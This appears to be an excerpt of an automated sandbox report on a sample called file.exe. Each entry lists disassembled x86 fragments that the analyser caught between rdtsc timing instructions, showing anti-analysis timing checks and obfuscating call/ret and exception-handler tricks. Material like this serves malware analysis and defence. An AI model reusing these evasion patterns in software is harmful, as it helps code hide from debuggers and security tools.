Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7A3E5 second address: D7A440 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e mov dword ptr [esp], ebx 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F8CE4DC41A8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b nop 0x0000002c je 00007F8CE4DC41C4h 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F8CE4DC41B6h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7A683 second address: D7A688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7AA14 second address: D7AA36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8CE4DC41B6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7AA36 second address: D7AA5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F8CE470D046h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8CE470D055h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7AEDC second address: D7AEE6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8CE4DC41ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7B946 second address: D7B94A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7C947 second address: D7C94B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7C13F second address: D7C15C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CE470D058h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7C94B second address: D7C968 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnp 00007F8CE4DC41A6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7C968 second address: D7CA15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edi 0x00000008 jmp 00007F8CE470D056h 0x0000000d pop edi 0x0000000e nop 0x0000000f jmp 00007F8CE470D055h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F8CE470D048h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Bh 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ecx 0x00000035 call 00007F8CE470D048h 0x0000003a pop ecx 0x0000003b mov dword ptr [esp+04h], ecx 0x0000003f add dword ptr [esp+04h], 00000019h 0x00000047 inc ecx 0x00000048 push ecx 0x00000049 ret 0x0000004a pop ecx 0x0000004b ret 0x0000004c push ebx 0x0000004d pushad 0x0000004e mov eax, dword ptr [ebp+122D2B20h] 0x00000054 mov eax, dword ptr [ebp+122D2AE4h] 0x0000005a popad 0x0000005b pop esi 0x0000005c jmp 00007F8CE470D054h 0x00000061 add dword ptr [ebp+1246AB93h], ecx 0x00000067 push eax 0x00000068 pushad 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c pop eax 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7CA15 second address: D7CA19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7E350 second address: D7E355 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7E355 second address: D7E35D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7E35D second address: D7E363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7E363 second address: D7E38A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8CE4DC41B7h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jo 00007F8CE4DC41AEh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7E38A second address: D7E3AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 jmp 00007F8CE470D057h 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7E3AD second address: D7E3B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7E3B3 second address: D7E3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7E3B7 second address: D7E3BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3C336 second address: D3C355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CE470D04Ch 0x00000009 jmp 00007F8CE470D04Eh 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7EA41 second address: D7EA69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8CE4DC41B2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7EA69 second address: D7EA6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7EA6F second address: D7EAB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c cld 0x0000000d push 00000000h 0x0000000f mov edi, dword ptr [ebp+122D32F2h] 0x00000015 push 00000000h 0x00000017 xor esi, 0D1BE9E5h 0x0000001d xchg eax, ebx 0x0000001e jmp 00007F8CE4DC41B3h 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7EAB8 second address: D7EABE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7EABE second address: D7EAC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7EAC4 second address: D7EAC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D80543 second address: D80567 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F8CE4DC41B8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D80567 second address: D8057C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CE470D051h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8057C second address: D80580 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7F293 second address: D7F299 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7F299 second address: D7F29F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3F915 second address: D3F91F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7F29F second address: D7F2A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D80B6A second address: D80B86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D054h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D80B86 second address: D80B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D82AD6 second address: D82ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8429D second address: D8434C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8CE4DC41A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnc 00007F8CE4DC41BEh 0x00000011 nop 0x00000012 call 00007F8CE4DC41B2h 0x00000017 pushad 0x00000018 mov bx, D4BCh 0x0000001c popad 0x0000001d pop edi 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push eax 0x00000023 call 00007F8CE4DC41A8h 0x00000028 pop eax 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d add dword ptr [esp+04h], 0000001Ah 0x00000035 inc eax 0x00000036 push eax 0x00000037 ret 0x00000038 pop eax 0x00000039 ret 0x0000003a jmp 00007F8CE4DC41B6h 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push ecx 0x00000044 call 00007F8CE4DC41A8h 0x00000049 pop ecx 0x0000004a mov dword ptr [esp+04h], ecx 0x0000004e add dword ptr [esp+04h], 00000018h 0x00000056 inc ecx 0x00000057 push ecx 0x00000058 ret 0x00000059 pop ecx 0x0000005a ret 0x0000005b mov bx, di 0x0000005e mov edi, dword ptr [ebp+122D2C98h] 0x00000064 push eax 0x00000065 push eax 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8434C second address: D84352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D828A0 second address: D828A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8530C second address: D85310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D85310 second address: D85347 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F8CE4DC41B1h 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D853F8 second address: D853FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D853FE second address: D85404 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D85404 second address: D85408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D85408 second address: D85429 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8643C second address: D864D0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D19DAh], edx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F8CE470D048h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push edi 0x00000032 call 00007F8CE470D048h 0x00000037 pop edi 0x00000038 mov dword ptr [esp+04h], edi 0x0000003c add dword ptr [esp+04h], 0000001Bh 0x00000044 inc edi 0x00000045 push edi 0x00000046 ret 0x00000047 pop edi 0x00000048 ret 0x00000049 mov dword ptr [ebp+1245BB66h], edi 0x0000004f xchg eax, esi 0x00000050 jmp 00007F8CE470D051h 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jne 00007F8CE470D05Ch 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D87346 second address: D8734A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8734A second address: D873C8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8CE470D059h 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F8CE470D048h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov ebx, dword ptr [ebp+122D2F1Dh] 0x0000002d push 00000000h 0x0000002f cmc 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebp 0x00000035 call 00007F8CE470D048h 0x0000003a pop ebp 0x0000003b mov dword ptr [esp+04h], ebp 0x0000003f add dword ptr [esp+04h], 00000017h 0x00000047 inc ebp 0x00000048 push ebp 0x00000049 ret 0x0000004a pop ebp 0x0000004b ret 0x0000004c movzx edi, cx 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F8CE470D04Dh 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D84494 second address: D844AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8CE4DC41B5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D844AE second address: D8452E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov edi, 11E75597h 0x0000000d push dword ptr fs:[00000000h] 0x00000014 je 00007F8CE470D058h 0x0000001a jmp 00007F8CE470D052h 0x0000001f jnp 00007F8CE470D046h 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c mov ebx, dword ptr [ebp+12449A45h] 0x00000032 mov eax, dword ptr [ebp+122D0801h] 0x00000038 push 00000000h 0x0000003a push edx 0x0000003b call 00007F8CE470D048h 0x00000040 pop edx 0x00000041 mov dword ptr [esp+04h], edx 0x00000045 add dword ptr [esp+04h], 00000019h 0x0000004d inc edx 0x0000004e push edx 0x0000004f ret 0x00000050 pop edx 0x00000051 ret 0x00000052 push FFFFFFFFh 0x00000054 pushad 0x00000055 stc 0x00000056 mov ecx, 44DEAA07h 0x0000005b popad 0x0000005c nop 0x0000005d jmp 00007F8CE470D04Ah 0x00000062 push eax 0x00000063 pushad 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D893C3 second address: D89414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 js 00007F8CE4DC41B2h 0x0000000c jmp 00007F8CE4DC41ACh 0x00000011 nop 0x00000012 mov bx, si 0x00000015 mov di, DC39h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007F8CE4DC41A8h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 stc 0x00000036 push 00000000h 0x00000038 mov dword ptr [ebp+124499ACh], ecx 0x0000003e xchg eax, esi 0x0000003f push eax 0x00000040 push edx 0x00000041 push edi 0x00000042 pushad 0x00000043 popad 0x00000044 pop edi 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D85584 second address: D85588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A4A0 second address: D8A4C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F8CE4DC41A6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A4C0 second address: D8A4D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D04Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A4D2 second address: D8A52A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8CE4DC41B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, esi 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F8CE4DC41A8h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 movsx ebx, cx 0x0000002c push 00000000h 0x0000002e or ebx, 755CF47Ch 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push esi 0x00000038 jnp 00007F8CE4DC41A6h 0x0000003e pop esi 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D874E6 second address: D874EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D874EA second address: D874F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D874F0 second address: D8756E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F8CE470D046h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f sbb ebx, 1BCED897h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007F8CE470D048h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 00000015h 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 or ebx, dword ptr [ebp+122D34D6h] 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 or dword ptr [ebp+12471C00h], ebx 0x00000049 mov eax, dword ptr [ebp+122D04CDh] 0x0000004f mov bl, al 0x00000051 push FFFFFFFFh 0x00000053 push 00000000h 0x00000055 push esi 0x00000056 call 00007F8CE470D048h 0x0000005b pop esi 0x0000005c mov dword ptr [esp+04h], esi 0x00000060 add dword ptr [esp+04h], 00000016h 0x00000068 inc esi 0x00000069 push esi 0x0000006a ret 0x0000006b pop esi 0x0000006c ret 0x0000006d cmc 0x0000006e movsx edi, dx 0x00000071 push eax 0x00000072 push esi 0x00000073 push eax 0x00000074 push edx 0x00000075 push ebx 0x00000076 pop ebx 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A6CF second address: D8A6D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8C810 second address: D8C815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8C815 second address: D8C81B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8C81B second address: D8C81F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8F01E second address: D8F029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9004A second address: D90050 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D90050 second address: D90056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D90056 second address: D9005A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D901A5 second address: D901A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D901A9 second address: D901C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F8CE470D054h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8F1C3 second address: D8F26E instructions: 0x00000000 rdtsc 0x00000002 js 00007F8CE4DC41ACh 0x00000008 ja 00007F8CE4DC41A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 sub di, D999h 0x00000016 xor edi, dword ptr [ebp+122D2CC0h] 0x0000001c push dword ptr fs:[00000000h] 0x00000023 push 00000000h 0x00000025 push ebx 0x00000026 call 00007F8CE4DC41A8h 0x0000002b pop ebx 0x0000002c mov dword ptr [esp+04h], ebx 0x00000030 add dword ptr [esp+04h], 0000001Bh 0x00000038 inc ebx 0x00000039 push ebx 0x0000003a ret 0x0000003b pop ebx 0x0000003c ret 0x0000003d jmp 00007F8CE4DC41ACh 0x00000042 mov dword ptr fs:[00000000h], esp 0x00000049 call 00007F8CE4DC41AEh 0x0000004e pop ebx 0x0000004f mov eax, dword ptr [ebp+122D122Dh] 0x00000055 push 00000000h 0x00000057 push ecx 0x00000058 call 00007F8CE4DC41A8h 0x0000005d pop ecx 0x0000005e mov dword ptr [esp+04h], ecx 0x00000062 add dword ptr [esp+04h], 0000001Bh 0x0000006a inc ecx 0x0000006b push ecx 0x0000006c ret 0x0000006d pop ecx 0x0000006e ret 0x0000006f sbb bx, 5B92h 0x00000074 push FFFFFFFFh 0x00000076 add ebx, 468DD5C3h 0x0000007c push eax 0x0000007d push eax 0x0000007e push edx 0x0000007f pushad 0x00000080 jno 00007F8CE4DC41A6h 0x00000086 pushad 0x00000087 popad 0x00000088 popad 0x00000089 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D934A5 second address: D934C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D04Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F8CE470D04Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D934C5 second address: D9351C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F8CE4DC41B6h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jo 00007F8CE4DC41B9h 0x00000012 jl 00007F8CE4DC41B3h 0x00000018 jmp 00007F8CE4DC41ADh 0x0000001d push 00000000h 0x0000001f or ebx, dword ptr [ebp+122D30C1h] 0x00000025 push 00000000h 0x00000027 mov bx, dx 0x0000002a xchg eax, esi 0x0000002b jmp 00007F8CE4DC41ACh 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push ecx 0x00000034 pushad 0x00000035 popad 0x00000036 pop ecx 0x00000037 rdtsc
